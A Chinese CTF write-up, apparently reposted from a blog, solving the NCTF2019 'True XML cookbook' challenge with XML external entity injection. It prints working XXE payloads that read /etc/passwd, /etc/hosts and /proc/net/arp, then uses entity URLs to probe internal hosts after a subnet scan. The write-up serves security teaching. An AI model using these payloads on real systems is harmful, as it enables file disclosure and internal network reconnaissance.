首页 > 其他分享> > [NCTF2019]True XML cookbook Writeup

[NCTF2019]True XML cookbook Writeup

2020-12-29 22:00:10 作者：互联网

结合本题简要讲解一下xxe攻击

本篇文章默认读者了解Xml基本格式
在这里插入图片描述
首先我们看到一个登录界面，使用burp抓包看一下：

这里暴露出来很明显的xxe注入点。

我们开始构造payload:

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE hacker[
<!ENTITY a SYSTEM "file:///etc/passwd"> 
]>
<user><username>&a;</username><password>a</password></user>

可以看到回显：
在这里插入图片描述
说明存在xxe注入

这里很关键的一个点在于考察，xxe其实可以用来打内网。

我们读取关键文件：/etc/hosts 和 /proc/net/arp。

payload:

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE hacker[
<!ENTITY a SYSTEM "file:///etc/hosts"> 
]>
<user><username>&a;</username><password>a</password></user>

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE hacker[
<!ENTITY a SYSTEM "file:///proc/net/arp"> 
]>
<user><username>&a;</username><password>a</password></user>

回显分别是：
在这里插入图片描述

在这里插入图片描述
给了一个主机IP，读取一下：

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE hacker[
<!ENTITY a SYSTEM "http://10.106.213.2/"> 
]>
<user><username>&a;</username><password>a</password></user>

在这里插入图片描述
直接报错，但没关系，我们可以进行C段扫描

扫描结果如下：在这里插入图片描述

即：

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE hacker[
<!ENTITY a SYSTEM "http://10.106.213.11/"> 
]>
<user><username>&a;</username><password>a</password></user>

即可

考查知识点：

xxe注入攻击
xxe内网探测

难度：

简单

总结：

保持谦虚，继续学习

标签：XML,读取,回显,Writeup,扫描,xxe,cookbook,payload,注入
来源： https://blog.csdn.net/StevenOnesir/article/details/111937766